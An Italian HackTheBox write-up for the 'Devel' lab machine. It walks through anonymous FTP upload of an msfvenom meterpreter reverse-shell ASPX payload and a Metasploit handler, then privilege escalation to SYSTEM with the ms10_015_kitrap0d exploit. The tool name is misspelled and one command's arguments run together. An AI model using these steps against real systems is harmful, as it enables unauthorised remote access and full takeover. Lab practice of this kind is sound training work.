Devel – HackTheBox

Hack The Box Hack The Box

Iniziamo subito con la scansione delle porte

nmap -sV -sC -oN nmap  10.10.10.5

otterremo

PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 01:06AM <DIR> aspnet_client
| 01-19-17 06:48PM 2862 devel.aspx
| 03-17-17 04:37PM 689 iisstart.htm
|_03-17-17 04:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Collegandoci alla porta 21 con ftp e

ftp 10.10.10.5

Loggandoci con l’utente anonymous, noteremo che è la directory che ospita il server web

Usiamo msvenom

mfvenom -p windows/meterpreter/reverse_tcp LHOST=<Il_vostro_indirizzo_ip>LPORT=4444 -f aspx -o freemaker.aspx

Carichiamo il file sulla porta 21

put freemaker.aspx

lanciamo msfconsole.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost <indirizzo_ip>

set lport <porta>

run

Andando sul browser e visitando la pagina http://10.10.10.5/freemaker.aspx otterremo una reverse shell

Privilege escalation

mettendo in background la sessione

background

e usando local_exploit_suggester

use post/multi/recon/local_exploit_suggester

set session <numero_della_sessione>

run

noteremo che la macchina è vulnerabile a ms10_015_kitrap0d

use exploit/windows/local/ms10_015_kitrap0d

set session <numero_della_sessione>

run

E come per magia diventeremo system

 

Categorie: CTF

0 commenti

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *